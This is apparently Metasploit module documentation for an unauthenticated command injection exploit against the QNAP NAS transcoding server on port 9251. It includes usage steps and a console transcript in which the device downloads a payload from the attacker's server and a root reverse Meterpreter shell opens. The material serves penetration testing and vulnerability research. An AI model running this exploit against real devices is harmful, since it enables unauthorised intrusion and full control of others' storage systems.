## Description

  This module exploits an unauthenticated remote command injection vulnerability in QNAP NAS devices. The transcoding server listens on port 9251 by default and is vulnerable to command injection using the 'rmfile' command.


## Vulnerable Application

  [QNAP](https://www.qnap.com/) designs and delivers high-quality network attached storage (NAS) and professional network video recorder (NVR) solutions to users from home, SOHO to small, medium businesses.

  This module was tested successfully on a QNAP TS-431 with firmware version 4.3.3.0262 (20170727).


## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/linux/misc/qnap_transcode_server`
  3. Do: `set RHOST [IP]`
  4. Do: `set LHOST [IP]`
  5. Do: `run`
  6. You should get a session


## Options

  **Delay**

  How long to wait (in seconds) for the device to download the payload.


## Scenarios

  ```
  msf > use exploit/linux/misc/qnap_transcode_server 
  msf exploit(qnap_transcode_server) > set rhost 10.1.1.123
  rhost => 10.1.1.123
  msf exploit(qnap_transcode_server) > check
  [*] 10.1.1.123:9251 The target service is running, but could not be validated.
  msf exploit(qnap_transcode_server) > set lhost 10.1.1.197
  lhost => 10.1.1.197
  msf exploit(qnap_transcode_server) > run

  [*] Started reverse TCP handler on 10.1.1.197:4444 
  [*] 10.1.1.123:9251 - Using URL: http://0.0.0.0:8080/IQrgbm
  [*] 10.1.1.123:9251 - Local IP: http://10.1.1.197:8080/IQrgbm
  [*] 10.1.1.123:9251 - Sent command successfully (52 bytes)
  [*] 10.1.1.123:9251 - Waiting for the device to download the payload (30 seconds)...
  [*] 10.1.1.123:9251 - Sent command successfully (22 bytes)
  [*] 10.1.1.123:9251 - Sent command successfully (13 bytes)
  [*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.123:53888) at 2017-08-13 05:05:18 -0400
  [*] 10.1.1.123:9251 - Sent command successfully (19 bytes)
  [*] 10.1.1.123:9251 - Command Stager progress - 100.00% done (109/109 bytes)
  [*] 10.1.1.123:9251 - Server stopped.

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo 
  Computer     : 10.1.1.123
  OS           :  (Linux 3.2.26)
  Architecture : armv7l
  Meterpreter  : armle/linux
  ```